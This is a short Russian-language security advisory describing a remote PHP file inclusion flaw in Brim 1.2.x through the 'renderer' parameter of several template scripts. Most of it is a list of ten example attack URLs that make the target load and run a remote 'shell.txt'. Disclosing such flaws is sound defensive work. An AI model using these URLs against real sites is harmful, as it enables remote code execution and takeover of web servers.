Программа: Brim 1.2.x

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "renderer" множественными сценариями. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Примеры:

http://www.target.***/[path]/templates/barrel/template.tpl.php?renderer=http://shell.txt?
http://www.target.***/[path]/templates/sidebar/template.tpl.php?renderer=http://shell.txt?
http://www.target.***/[path]/templates/text-only/template.tpl.php?renderer=http://shell.txt?
http://www.target.***/[path]/templates/slashdot/template.tpl.php?renderer=http://shell.txt?
http://www.target.***/[path]/templates/penguin/template.tpl.php?renderer=http://shell.txt?
http://www.target.***/[path]/templates/pda/template.tpl.php?renderer=http://shell.txt?
http://www.target.***/[path]/templates/oerdec/template.tpl.php?renderer=http://shell.txt?
http://www.target.***/[path]/templates/nifty/template.tpl.php?renderer=http://shell.txt?
http://www.target.***/[path]/templates/mylook/template.tpl.php?renderer=http://shell.txt?
http://www.target.***/[path]/templates/barry/template.tpl.php?renderer=http://shell.txt?

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии